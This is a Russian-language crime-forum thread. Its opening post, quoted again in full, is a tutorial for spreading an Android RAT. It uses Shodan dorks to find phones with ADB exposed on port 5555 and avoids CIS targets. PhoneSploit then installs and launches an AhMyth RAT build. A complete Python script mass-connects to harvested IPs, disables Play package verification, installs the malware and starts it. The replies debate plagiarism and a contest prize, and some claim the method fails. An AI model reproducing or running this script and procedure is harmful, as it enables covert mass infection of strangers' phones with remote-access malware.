• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Добываем инсталлы для .APK файла при помощи PhoneSploit + Shodan | Конкурс статей xss.pro

V1rtualGh0st

(L3) cache
Пользователь
Регистрация
08.12.2018
Сообщения
228
Реакции
485
Гарант сделки
19
Депозит
0.00
Привет, XSS'овец, сегодня поведаю тебе о способе добычи бесплатных установок для твоего андроид-ботнета/RAT'a/Клиппера и прочей нечисти. В этой статье будет использоваться инструмент под названием PhoneSploit. О его возможностях мы поговорим чуть позже. Прежде чем рассказать о самом способе, сначала расскажу о его плюсах и минусах.​

Плюсы:
  • Это абсолютно бесплатно.
  • Количество инсталлов будет зависеть от вашей продуктивности и кол-ве уязвимых устройств.
  • Так как мы работаем с Shodan, мы можем отфильтровать страны, тем самым убрать СНГ устройства, обезопасив себя от работы по РУ.
  • Всё это дело можно будет автоматизировать, с помощью не сложных скриптов на Python'e.
Минусы:
  • Один из самых огромных минусов является то, что вы, возможно, будете не единственным человеком заразившим уязвимое устройство. Это связано с тем, что список устройств находится в открытом доступе.
  • Для автоматизации нужен будет API ключ для Shodan. (не обязательно, но желательно)
Всю статью я разжую максимально подробно, чтобы у тебя, %username%, не возникли вопросы. Статья делится на 4 этапа, поэтому можно считать это за пошаговый мануал.
Садись поудобнее, мы начинаем!
Android.png

ЭТАП I. Установка PhoneSploit и пару слов об уязвимости.

Уязвимость андроид устройств заключается в ADB.
Android Debug Bridge (adb )- это универсальный инструмент командной строки, который позволяет взаимодействовать с устройством. Команда adb облегчает различные действия устройства, такие как установка и отладка приложений, и предоставляет доступ к оболочке Unix, которую можно использовать для выполнения различных команд на устройстве Обычно разработчики подключаются к службе ADB, установленной на устройствах Android, с помощью USB-кабеля, но также можно использовать ADB wireless, включив daemon-сервер на TCP-порте 5555.

И эксплуатировать эту уязвимость мы будем при помощи PhoneSploit.

PhoneSploit - проект на Python2 с открытым исходным кодом. PhoneSploit может использовать в Android открытые порты Adb. Этот скрипт доступен как для Linux, так и для Windows.

Как и было сказано выше, инструмент можно установить как на Linux, так и на Windows. Приступим к установке.

Так как скрипт написан на Python 2-ых версий, соответсвенно устанавливаем именно именно эту версию. Качаем с официального сайта.
Далее переходим в репозиторий на гитхабе, и скачиваем архив со скриптом.
1572676111813.png


Для удобства перекидываем файлы с архивом прямо в папку с питоном, и разархивируем архив abd.rar в текущию директорию. Должно получиться примерно так:

1572676268979.png


Установим необходимую для запуска библиотеку - colorama, командой; pip install colorama

Ну и для теста попробуем запустить скрипт командой: python.exe main.py

1572676339814.png

С установкой на Unix системы всё гораздо проще. Открываем терминал, затем поочерёдно вводим следующие команды:

git clone https://github.com/metachar/PhoneSploit cd PhoneSploit pip install colorama python2 main_linux.py
1572676368144.png


И если покажется интерфейс скрипта, то всё прошло гладко.

После установки инструмента, переходим ко второму этапу.

ЭТАП II. Знакомство с Shodan и поиск уязвимых устройств.
Что же представляет собой поисковик SHODAN?

Система SHODAN опрашивает порты подсоединенных к сети машин и собирает выдаваемые в ответ баннеры, после чего индексирует эти баннеры на предмет последующего быстрого отыскания соответствующих устройств. В итоге такой обработки, вместо того, чтобы предоставлять специфический контент страниц, содержащих конкретное поисковое слово запроса, SHODAN помогает своим пользователям отыскивать специфические узлы сети: настольные системы, серверы, роутеры, свитчи, веб-камеры, принтеры и т.д.

Для более "узкого" поиска в Shodan, существует множество фильтров, вот некоторые из них:
  • country: "Код страны" - Служит для отсеивания устройств по определённым странам. Пример: contry: "US"
  • city: "Имя города" - Служит для фильтрации по городам. Пример: city: "New York"
  • product: "Имя/Описание продукта" - Служит для фильтрации по имени или описании продукта. Пример: product:”Android Debug Bridge”
Конечно же эти фильтры можно использовать в связке, тем самым получив максимально нужный диапазон жертв.

Итак, теперь, когда мы познакомились с нашим поисковиком, а также предварительно залогинилсь в нём, покажу нужный нам дорк:
android debug bridge product:”Android Debug Bridge”

После попытки поиска, получаем IP адреса андроид устройств:
1572676588771.png


Устройства найдены, можем приступить к следующему этапу.


ЭТАП III. Обзор функционала PhoneSploit.

Не буду писать про каждый функционал отдельно, поэтому просто посмотри на текст ниже:

Код:
____ __ _____ __ _ __

/ __ \/ /_ ____ ____ ___ / ___/____ / /___ (_) /_

/ /_/ / __ \/ __ \/ __ \/ _ \__ \/ __ \ / / __ \/ / __/

/ ____/ / / / /_/ / / / / __/__/ / /_/ / / /_/ / / /_

/_/ /_/ /_/\____/_/ /_/\___/____/ .___/_/\____/_/\__/

/_/


[ 1 ] показать подключенные устройства [ 6 ] Запись экрана телефона [ 11 ] удаление приложения

[ 2 ] отключить все устройства [ 7 ] снимок экрана на телефоне [ 12 ] показать журнал работы устройства в реальном времени

[ 3 ] подключение нового телефона [ 8 ] перезапуск сервера [ 13 ] дамп информации о системе

[ 4 ] доступ к командной оболочке на телефоне [ 9 ] перенос папок с телефона на ПК [ 14 ] Список всех приложений на телефоне

[ 5 ] Установить apk на телефон [ 10 ] Выключить устройство [ 15 ] запустить приложение

[ 99 ] выход [ 0 ] очистить [ p ] Следующая страница v1. 2

Попробуем подключиться к устройству. Выбираем 3й пункт, далее вводим IP телефона:

1572676684568.png


Проверим подключения, выберем первый пункт:
1572676719186.png


Теперь подготовим билд нашего зверька, загрузим его на телефон. Выбираем 5й пункт, далее вводим прямой путь до .apk файла (я устанавливаю билд AhMyth RAT'a):

1572679914955.png


Всё практически готово, осталось запустить наше приложение. Узнаем список приложений на телефоне выбрав 14й пункт:

1572679981928.png


Среди всех приложений, нам нужно найти имя нашего пакета. Я использовал AhMyth RAT, поэтому быстро нашёл нужный нам пакет:

1572680090775.png


Ну и для запуска выбираем 15й пункт и вводим имя нашего пакета (ВАЖНО: Вводить нужно только имя, в моём случае это: ahmyth.mine.king.ahmyth):

1572680154403.png


Ну и ловим соединие, но уже через РАТ:

1572680458467.png


Этап IV. Автоматизация с помощью скриптов.

Для автоматизации всего этого дела, у меня есть 2 скрипта. Один из них парсит IP'шники с Shodan'a, и находится в открытом доступе. И второй, нужен для автоматизации прогруза apk файла по IP'шникам находящимся в файле.


И так, первый скрипт.

Написан на Python3 и доступен в открытом виде на GitHub.


Download zip: https://github.com/LimerBoy/PS-Grabber/archive/master.zip

Unzip folder PS-Grabber

cd PS-Grabber/ pip install -r requirements.txt python grabber.py

git clone https://github.com/LimerBoy/PS-Grabber.git cd PS-Grabber/ sudo pip3 install -r requirements.txt python3 grabber.py

Запускаем скрипт и просто вводим количество страниц, с которых спарсятся IP:

1572680987949.png


В папке logs появится текстовой файл, в котором будут записаны ИПшники.

Скрипт #2.

Нет в паблике, был написан моим знакомым на Python3. Сам скрипт служит для прогруза файла, в коде нужно будет указать полный путь до .apk файла, текстовика с IP'шниками и имя пакета:
1572681633028.png


ВАЖНО! Этот скрипт не работает на Windows машинах, поэтому запускай на линуксе.
Python:
import subprocess
from pathlib import Path
import os
import time

logo = '''
__  ______ ____   ___ ____    _   _            __     ___      _               _  ____ _      ___      _  
\ \/ / ___/ ___| |_ _/ ___|  | | | |__  _   _  \ \   / / |_ __| |_ _   _  __ _| |/ ___| |__  / _ \ ___| |_
  \  /\___ \___ \  | |\___ \  | | | '_ \| | | |  \ \ / /| | '__| __| | | |/ _` | | |  _| '_ \| | | / __| __|
  /  \ ___) |__) | | | ___) | | | | |_) | |_| |   \ V / | | |  | |_| |_| | (_| | | |_| | | | | |_| \__ \ |_
/_/\_\____/____(_)___|____/  | | |_.__/ \__, |    \_/  |_|_|   \__|\__,_|\__,_|_|\____|_| |_|\___/|___/\__|
                              |_|        |___/
                                                                           ________________________________
                                                                          |     Author Telegram: @XazkerBoy
                                                                          |   Logo & Manual by V1rtualGh0st
                                                                          ---------------------------------
'''

print(logo)

apkpath = '/root/PhoneSploit/a.apk'    #Path to the APK file that should be installed
apkpkg = 'system.operating.dominance.proj'    #APK package name (can be seen by installing aapt and running 'aapt dump badging <path-to-apk> | grep package:\ name')
ippath = '/root/results.txt'    #Path with IPs of devices, on which the PAK will be installed
delay = 3

def checkconnect(ip):
    process = subprocess.Popen(['adb', 'connect', ip + ':5555'], stdout=subprocess.PIPE)
    time.sleep(delay)
    data = process.communicate()
    if 'unable to connect' in data[0]:
        os.system('adb disconnect')
        return False
    return True

def install(ip):
    os.system('adb -s ' + ip + ' shell settings put global verifier_verify_adb_installs 0')
    time.sleep(delay)
    os.system('adb -s ' + ip + ' shell settings put global package_verifier_enable 0')
    time.sleep(delay)
    os.system('adb -s ' + ip + ' uninstall ' + apkpkg)
    time.sleep(delay)
    os.system('adb -s ' + ip + ' install ' + apkpath)
    time.sleep(delay)
    os.system('adb -s ' + ip + ' shell monkey -p ' + apkpkg + ' -v 10')
    time.sleep(delay)
    os.system('adb disconnect')

if apkpath == '':
    print('No APK selected!')
    exit()

my_file = Path(apkpath)
if not my_file.exists():
    print('That APK doesnt exist!')
    exit()

if ippath == '':
    print('No file with IPs selected!')
    exit()

my_file = Path(ippath)
if not my_file.exists():
    print('That IP file doesnt exist!')
    exit()

try:
    os.system('adb kill-server')
except:
    print('An error has occured\nMaybe ADB is not installed, please install it and restart the app')
    exit()

os.system('adb tcpip 5555')

f = open(ippath, 'r')

for line in f.readlines():
    if line == '':
        continue

    if not checkconnect(line.strip()):
        print('Could not connect to ' + line.strip())
        continue

    print('Successfully connected to ' + line.strip())

    install(line.strip())

os.system('adb kill-server')
f.close()
print('DONE!')

Имея открытые сурсы обоих скриптов, умельцы смогут объединить эти инструменты в один.


Итоги.
Вот таким нехитрым способом мы сможем распространить свою пакость по андроид-устройствам. На момент написания статьи в Shodan насчитывалось 11.000+ уязвимых, перед ADB, устройств. Вся статья уместилась в 4 этапа, думаю сложностей не должно возникнуть, так как постарался расписать всё максимально подробно и понятно. Но если всё же вопросы остались, можешь задать их либо в этой теме, либо у меня в лс на форуме. На этом всё, удачного спрединга!

by V1rtualGh0st | Special for xss.pro
 

Вложения

  • 1572676323038.png
    1572676323038.png
    7.7 КБ · Просмотры: 208
  • xss.pro _ by V1rual Gh0st .png
    xss.pro _ by V1rual Gh0st .png
    5.3 КБ · Просмотры: 203
Последнее редактирование:
не ты старался а он как видно

тааакс... ну походу ждем админа для рассмотрения. В любом случае кто бы это не создал - он красавчик, способ реально заслуживает внимание + понятен овощу)
 
Да по сути это рерайт любого PhoneSploit ролика с ютуба. На видео выше добавлен "PS Grabber"
1572728776300.png

1572728787400.png
Аналогично собственно в статье добавлен последний скрипт.

Как относится к подобного рода статьям переписаным полностью с паблика, имеющим около полу-миллиона просмотров в сумме с 3-4 роликов - не совсем ясно.
1572731476700.png

Разбираться в любом случае будет администратор, но мое имхо, что 1к$ такой рерайт с добавлением скрипта на питоне - не должен.
 
Хочется матом написать, статья реально понравилась, а ситуация вышла неоднозначная в итоге. Админу теперь разгребать.
А у меня сейчас по сути прочитанного (и потмо увиденного) остался вопрос. Я правильно понимаю, что 5555 порт открывается на устройстве при коннекте к сети и не выключеном дебаг режиме, а миру он виден потому что на вафле нет ната? Тоесть это все эти "гениальные" сверхдешевые провайдерские бесплатные модемы с вафлей, в которых просто отсутстствует нат и по этмоу порт транслируется тупо в сеть? Или тут чуть веселее и шодан дергает роутеры с дефолтными данными доступа, заходя в локалку юзера и уже оттуда скрипт форвардится всё на устройство юзера? Разница между этими варантами по сути в полностью откртом транслировании порта наружу или это "типа закрытый для инета" порт и совмещена проблема использования дефолтных юзер:пасс-ов?
 
Я правильно понимаю, что 5555 порт открывается на устройстве при коннекте к сети и не выключеном дебаг режиме, а миру он виден потому что на вафле нет ната?
Не совсем так. На некоторых устройствах отладка по юсб установлена в дефолтном режиме (именно из-за отладки мы и можем эксплуатировать уязвимость). В остальных случаях отладку включает сам пользователь. А наличие NAT'a или его отсутствие никак не взаимодействует с адб.


Хочется матом написать, статья реально понравилась, а ситуация вышла неоднозначная в итоге.
Касательно этого. Я показал использование PhoneSploit в качестве добычи инсталлов. Почему вышло так, что статья считается за копипаст? Потому что порядок действий один и тот же, как и в видео. Это как использовать msf для проникновения в Лан сеть с етёрнал блю, то есть порядок действий такой же, как и с обычным эксплуатированием етёрнал, но видимо все это так же будут считать это за копипаст.

Установка апк файла - это лишь одна из возможностей PhoneSploit'a. Как можно скопипастить обзор функционала, в котором порядок действий всегда один и тот же, и другим быть не может?


На видео выше добавлен "PS Grabber"
Таких скриптов есть достаточно, если использование именно этого скрипта сделало статью копипастом, могу переделать метод добычи IP при помощи другого скрипта.

UPD: Дорк для шодана есть в репозитории PhoneSploit'a он не является каким-то "приватным"
.
 
Последнее редактирование:
Не совсем так. На некоторых устройствах отладка по юсб установлена в дефолтном режиме (именно из-за отладки мы и можем эксплуатировать уязвимость). В остальных случаях отладку включает сам пользователь. А наличие NAT'a или его отсутствие никак не взаимодействует с адб.
Чёт ты не то говоришь. Как может нат не влиять, это же нат. Стоит у тебя роутер, к ниму по вафле подключены все 4 смарта счастливой семьи, на всех из них шаловливый сынуля включил режим отладки. 4 подходящих смарта, 1 роутер, нат - как будет взаимодействовать PhoneSploit с ними из внешнего инета? По всем правилам IT ответ будет - никак, потому что нат не даст. Отсюда вопрос, как подключается софт к телефонам и работает ли эта схема толкьо когда есть доступ к девайсу из сети без ната, либо скрипт пробует дефолтные логин-пассворды роутеров и если заходит, то куда форвардинг пошлет на тот девайс он и подрубится, оставив остальыне не тронутыми?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Чёт ты не то говоришь. Как может нат не влиять, это же нат. Стоит у тебя роутер, к ниму по вафле подключены все 4 смарта счастливой семьи, на всех из них шаловливый сынуля включил режим отладки. 4 подходящих смарта, 1 роутер, нат - как будет взаимодействовать PhoneSploit с ними из внешнего инета? По всем правилам IT ответ будет - никак, потому что нат не даст. Отсюда вопрос, как подключается софт к телефонам и работает ли эта схема толкьо когда есть доступ к девайсу из сети без ната, либо скрипт пробует дефолтные логин-пассворды роутеров и если заходит, то куда форвардинг пошлет на тот девайс он и подрубится, оставив остальыне не тронутыми?
Очевидно же что человек даже не разбирается, а тупой копипаст

короче в бан товарища ^_^

https://github.com/LimerBoy/PS-Grabber/blob/master/grabber.py берем ссылку и скриншоты с его статьи, на скринах везде подписано xss.pro а в ните изменения 2х месячной давности и вообще ТСа ни кто не знает)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет, XSS'овец, сегодня поведаю тебе о способе добычи бесплатных установок для твоего андроид-ботнета/RAT'a/Клиппера и прочей нечисти. В этой статье будет использоваться инструмент под названием PhoneSploit. О его возможностях мы поговорим чуть позже. Прежде чем рассказать о самом способе, сначала расскажу о его плюсах и минусах.​

Плюсы:
  • Это абсолютно бесплатно.
  • Количество инсталлов будет зависеть от вашей продуктивности и кол-ве уязвимых устройств.
  • Так как мы работаем с Shodan, мы можем отфильтровать страны, тем самым убрать СНГ устройства, обезопасив себя от работы по РУ.
  • Всё это дело можно будет автоматизировать, с помощью не сложных скриптов на Python'e.
Минусы:
  • Один из самых огромных минусов является то, что вы, возможно, будете не единственным человеком заразившим уязвимое устройство. Это связано с тем, что список устройств находится в открытом доступе.
  • Для автоматизации нужен будет API ключ для Shodan. (не обязательно, но желательно)
Всю статью я разжую максимально подробно, чтобы у тебя, %username%, не возникли вопросы. Статья делится на 4 этапа, поэтому можно считать это за пошаговый мануал.
Садись поудобнее, мы начинаем!
Посмотреть вложение 6303

ЭТАП I. Установка PhoneSploit и пару слов об уязвимости.

Уязвимость андроид устройств заключается в ADB.


И эксплуатировать эту уязвимость мы будем при помощи PhoneSploit.



Как и было сказано выше, инструмент можно установить как на Linux, так и на Windows. Приступим к установке.

Так как скрипт написан на Python 2-ых версий, соответсвенно устанавливаем именно именно эту версию. Качаем с официального сайта.
Далее переходим в репозиторий на гитхабе, и скачиваем архив со скриптом.
Посмотреть вложение 6287

Для удобства перекидываем файлы с архивом прямо в папку с питоном, и разархивируем архив abd.rar в текущию директорию. Должно получиться примерно так:

Посмотреть вложение 6288

Установим необходимую для запуска библиотеку - colorama, командой; pip install colorama

Ну и для теста попробуем запустить скрипт командой: python.exe main.py

Посмотреть вложение 6290

С установкой на Unix системы всё гораздо проще. Открываем терминал, затем поочерёдно вводим следующие команды:

git clone https://github.com/metachar/PhoneSploit cd PhoneSploit pip install colorama python2 main_linux.py
Посмотреть вложение 6291

И если покажется интерфейс скрипта, то всё прошло гладко.

После установки инструмента, переходим ко второму этапу.

ЭТАП II. Знакомство с Shodan и поиск уязвимых устройств.
Что же представляет собой поисковик SHODAN?



Для более "узкого" поиска в Shodan, существует множество фильтров, вот некоторые из них:
  • country: "Код страны" - Служит для отсеивания устройств по определённым странам. Пример: contry: "US"
  • city: "Имя города" - Служит для фильтрации по городам. Пример: city: "New York"
  • product: "Имя/Описание продукта" - Служит для фильтрации по имени или описании продукта. Пример: product:”Android Debug Bridge”
Конечно же эти фильтры можно использовать в связке, тем самым получив максимально нужный диапазон жертв.

Итак, теперь, когда мы познакомились с нашим поисковиком, а также предварительно залогинилсь в нём, покажу нужный нам дорк:
android debug bridge product:”Android Debug Bridge”

После попытки поиска, получаем IP адреса андроид устройств:
Посмотреть вложение 6292

Устройства найдены, можем приступить к следующему этапу.


ЭТАП III. Обзор функционала PhoneSploit.

Не буду писать про каждый функционал отдельно, поэтому просто посмотри на текст ниже:

Код:
____ __ _____ __ _ __

/ __ \/ /_ ____ ____ ___ / ___/____ / /___ (_) /_

/ /_/ / __ \/ __ \/ __ \/ _ \__ \/ __ \ / / __ \/ / __/

/ ____/ / / / /_/ / / / / __/__/ / /_/ / / /_/ / / /_

/_/ /_/ /_/\____/_/ /_/\___/____/ .___/_/\____/_/\__/

/_/


[ 1 ] показать подключенные устройства [ 6 ] Запись экрана телефона [ 11 ] удаление приложения

[ 2 ] отключить все устройства [ 7 ] снимок экрана на телефоне [ 12 ] показать журнал работы устройства в реальном времени

[ 3 ] подключение нового телефона [ 8 ] перезапуск сервера [ 13 ] дамп информации о системе

[ 4 ] доступ к командной оболочке на телефоне [ 9 ] перенос папок с телефона на ПК [ 14 ] Список всех приложений на телефоне

[ 5 ] Установить apk на телефон [ 10 ] Выключить устройство [ 15 ] запустить приложение

[ 99 ] выход [ 0 ] очистить [ p ] Следующая страница v1. 2

Попробуем подключиться к устройству. Выбираем 3й пункт, далее вводим IP телефона:

Посмотреть вложение 6293

Проверим подключения, выберем первый пункт:
Посмотреть вложение 6294

Теперь подготовим билд нашего зверька, загрузим его на телефон. Выбираем 5й пункт, далее вводим прямой путь до .apk файла (я устанавливаю билд AhMyth RAT'a):

Посмотреть вложение 6295

Всё практически готово, осталось запустить наше приложение. Узнаем список приложений на телефоне выбрав 14й пункт:

Посмотреть вложение 6296

Среди всех приложений, нам нужно найти имя нашего пакета. Я использовал AhMyth RAT, поэтому быстро нашёл нужный нам пакет:

Посмотреть вложение 6297

Ну и для запуска выбираем 15й пункт и вводим имя нашего пакета (ВАЖНО: Вводить нужно только имя, в моём случае это: ahmyth.mine.king.ahmyth):

Посмотреть вложение 6298

Ну и ловим соединие, но уже через РАТ:

Посмотреть вложение 6299

Этап IV. Автоматизация с помощью скриптов.

Для автоматизации всего этого дела, у меня есть 2 скрипта. Один из них парсит IP'шники с Shodan'a, и находится в открытом доступе. И второй, нужен для автоматизации прогруза apk файла по IP'шникам находящимся в файле.


И так, первый скрипт.

Написан на Python3 и доступен в открытом виде на GitHub.


Download zip: https://github.com/LimerBoy/PS-Grabber/archive/master.zip

Unzip folder PS-Grabber

cd PS-Grabber/ pip install -r requirements.txt python grabber.py

git clone https://github.com/LimerBoy/PS-Grabber.git cd PS-Grabber/ sudo pip3 install -r requirements.txt python3 grabber.py

Запускаем скрипт и просто вводим количество страниц, с которых спарсятся IP:

Посмотреть вложение 6300

В папке logs появится текстовой файл, в котором будут записаны ИПшники.

Скрипт #2.

Нет в паблике, был написан моим знакомым на Python3. Сам скрипт служит для прогруза файла, в коде нужно будет указать полный путь до .apk файла, текстовика с IP'шниками и имя пакета:
Посмотреть вложение 6301

ВАЖНО! Этот скрипт не работает на Windows машинах, поэтому запускай на линуксе.
Python:
import subprocess
from pathlib import Path
import os
import time

logo = '''
__  ______ ____   ___ ____    _   _            __     ___      _               _  ____ _      ___      _ 
\ \/ / ___/ ___| |_ _/ ___|  | | | |__  _   _  \ \   / / |_ __| |_ _   _  __ _| |/ ___| |__  / _ \ ___| |_
  \  /\___ \___ \  | |\___ \  | | | '_ \| | | |  \ \ / /| | '__| __| | | |/ _` | | |  _| '_ \| | | / __| __|
  /  \ ___) |__) | | | ___) | | | | |_) | |_| |   \ V / | | |  | |_| |_| | (_| | | |_| | | | | |_| \__ \ |_
/_/\_\____/____(_)___|____/  | | |_.__/ \__, |    \_/  |_|_|   \__|\__,_|\__,_|_|\____|_| |_|\___/|___/\__|
                              |_|        |___/
                                                                           ________________________________
                                                                          |     Author Telegram: @XazkerBoy
                                                                          |   Logo & Manual by V1rtualGh0st
                                                                          ---------------------------------
'''

print(logo)

apkpath = '/root/PhoneSploit/a.apk'    #Path to the APK file that should be installed
apkpkg = 'system.operating.dominance.proj'    #APK package name (can be seen by installing aapt and running 'aapt dump badging <path-to-apk> | grep package:\ name')
ippath = '/root/results.txt'    #Path with IPs of devices, on which the PAK will be installed
delay = 3

def checkconnect(ip):
    process = subprocess.Popen(['adb', 'connect', ip + ':5555'], stdout=subprocess.PIPE)
    time.sleep(delay)
    data = process.communicate()
    if 'unable to connect' in data[0]:
        os.system('adb disconnect')
        return False
    return True

def install(ip):
    os.system('adb -s ' + ip + ' shell settings put global verifier_verify_adb_installs 0')
    time.sleep(delay)
    os.system('adb -s ' + ip + ' shell settings put global package_verifier_enable 0')
    time.sleep(delay)
    os.system('adb -s ' + ip + ' uninstall ' + apkpkg)
    time.sleep(delay)
    os.system('adb -s ' + ip + ' install ' + apkpath)
    time.sleep(delay)
    os.system('adb -s ' + ip + ' shell monkey -p ' + apkpkg + ' -v 10')
    time.sleep(delay)
    os.system('adb disconnect')

if apkpath == '':
    print('No APK selected!')
    exit()

my_file = Path(apkpath)
if not my_file.exists():
    print('That APK doesnt exist!')
    exit()

if ippath == '':
    print('No file with IPs selected!')
    exit()

my_file = Path(ippath)
if not my_file.exists():
    print('That IP file doesnt exist!')
    exit()

try:
    os.system('adb kill-server')
except:
    print('An error has occured\nMaybe ADB is not installed, please install it and restart the app')
    exit()

os.system('adb tcpip 5555')

f = open(ippath, 'r')

for line in f.readlines():
    if line == '':
        continue

    if not checkconnect(line.strip()):
        print('Could not connect to ' + line.strip())
        continue

    print('Successfully connected to ' + line.strip())

    install(line.strip())

os.system('adb kill-server')
f.close()
print('DONE!')

Имея открытые сурсы обоих скриптов, умельцы смогут объединить эти инструменты в один.


Итоги.
Вот таким нехитрым способом мы сможем распространить свою пакость по андроид-устройствам. На момент написания статьи в Shodan насчитывалось 11.000+ уязвимых, перед ADB, устройств. Вся статья уместилась в 4 этапа, думаю сложностей не должно возникнуть, так как постарался расписать всё максимально подробно и понятно. Но если всё же вопросы остались, можешь задать их либо в этой теме, либо у меня в лс на форуме. На этом всё, удачного спрединга!

by V1rtualGh0st | Special for xss.pro
Более чем годно и информативно
 
Статья отличная, познавательно и интересно. Вот только одна проблема - вы не исходный автор.
К участию в конкурсе не допущена.
 
зачем использовать os.system, когда есть subprocess. И зачем делать print и exit. когда есть sys.exit. И много if - тоже глаза режет. Наверняка можно переделать, будет сильно короче.
 
зачем использовать os.system, когда есть subprocess. И зачем делать print и exit. когда есть sys.exit. И много if - тоже глаза режет. Наверняка можно переделать, будет сильно короче.
Не являюсь автором скрипта
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Hamlo, [11.11.19 23:00]
photo_2019-11-20_10-50-04.jpg


Hamlo, [11.11.19 23:01]
Привет

Hamlo, [11.11.19 23:01]
ваш скрипт?

Чучмек, [11.11.19 23:01]
Да, позвольте спросить, а какой п**** его сп*****?

Hamlo, [11.11.19 23:02]
https://********.pw/index.php?threa...k-fajla-pri-pomoschi-phonesploit-shodan.7329/

Hamlo, [11.11.19 23:02]
да вот тему читаю

Чучмек, [11.11.19 23:03]
Да я вот тоже

Чучмек, [11.11.19 23:03]
Есть какие-то вопросы?

Hamlo, [11.11.19 23:04]
вообще хотелосьбы такое заиметь....))))

Hamlo, [11.11.19 23:04]
и увидеть в действии

Hamlo, [11.11.19 23:05]
реально рабочая вещь?или как?

Чучмек, [11.11.19 23:07]
Да вообще, изначально расчитывалось просто научиться запускать процы с помощью python, потом все перешло в это, позже кинул другу, а вот теперь хер щнаю, как оно на форуме оказалось :/. А так скрипт рабочий. За скок симп его там сливают?

Hamlo, [11.11.19 23:08]
да не сливает ...хз отписал ему...пока молчит....вы продаете его или...?

Hamlo, [11.11.19 23:09]
сама тема интерестная.....автоматом скрипт в телы апк устанавливает?

Чучмек, [11.11.19 23:15]
Скрипт #2.

Нет в паблике, был написан моим знакомым на Python3

Чучмек, [11.11.19 23:15]
[ Стикер ]

Чучмек, [11.11.19 23:15]
Всиысле блэт

Чучмек, [11.11.19 23:16]
Я вообще хз, кто он)


телега автора
 
Пожалуйста, обратите внимание, что пользователь заблокирован
бред....хрень не рабочая....как скрипт так и все остальное.....пацаны....не трати время....
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх